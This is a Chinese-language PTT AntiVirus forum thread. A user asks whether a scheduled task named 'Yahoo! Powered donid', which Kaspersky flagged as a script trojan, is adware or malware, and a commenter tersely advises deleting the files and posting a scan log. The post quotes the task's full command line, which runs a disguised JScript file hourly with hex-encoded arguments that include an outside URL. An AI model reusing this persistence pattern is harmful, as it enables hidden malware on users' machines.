作者joexx12 ((X ̄X)uu...)
看板AntiVirus
标题[问题] Yahoo! Powered donid广告程式?
时间Wed Aug 29 12:36:22 2018
最近换了Kaspersky 2019 free後
刚刚电脑 卡巴跳出一个讯息
侦测到恶意程式
HEUR:Trojan.Script.Generic
位置C:\Windows\System32\Tasks\Yahoo! Powered donid
我检查了我的工作排程
里面有个Yahoo! Powered donid
每隔一小时会执行一次
内容为
"C:\ProgramData\{8C024961-0640-C3A7-8086-5DE51AC4D62B}\rola.txt"
"687474703a2f2f7761676e672e636f6d"
"433a5c50726f6772616d446174615c7b38433032343936312d303634302d433341372d383038362d3544453531414334443632427d5c636972697369"
"433a5c50726f6772616d446174615c7b38433032343936312d303634302d433341372d383038362d3544453531414334443632427d5c63657461726f74"
"//B" "//E:jscript" "--IsErIk"
不知道这是广告程式还是恶意程式呢
有人有遇过吗?
--
※ 发信站: 批踢踢实业坊(ptt.cc), 来自: 223.141.1.72
※ 文章网址: https://webptt.com/cn.aspx?n=bbs/AntiVirus/M.1535517385.A.87A.html
1F:推 DINJIAPC: 上写的几个路境的档案一并杀一杀阿,你还要等第二个中标 08/29 15:38
2F:→ DINJIAPC: 的共商心得是吗 08/29 15:38
3F:→ DINJIAPC: 名称就写木马了 有广告或工具取向的pup你还不是要在杀 08/29 15:40
4F:→ joexx12: 删除是一定删除的 只是想讨论 因为不知道怎发生的 所以才 08/29 20:01
5F:→ joexx12: 上来问问有没有人遇过 08/29 20:01
6F:→ DINJIAPC: 把frst的log跑来在说 08/29 21:08
7F:推 DINJIAPC: 不知道怎发生的? 难不成我知道吗 ?纪录没跑出来谁会知 08/30 20:26
8F:→ DINJIAPC: 道你电脑啥状况,那你会不会哪天儿子抱错了也不知道 08/30 20:27
10F:→ DINJIAPC: overy-scan-tool/ 纪录跑出来 08/30 20:45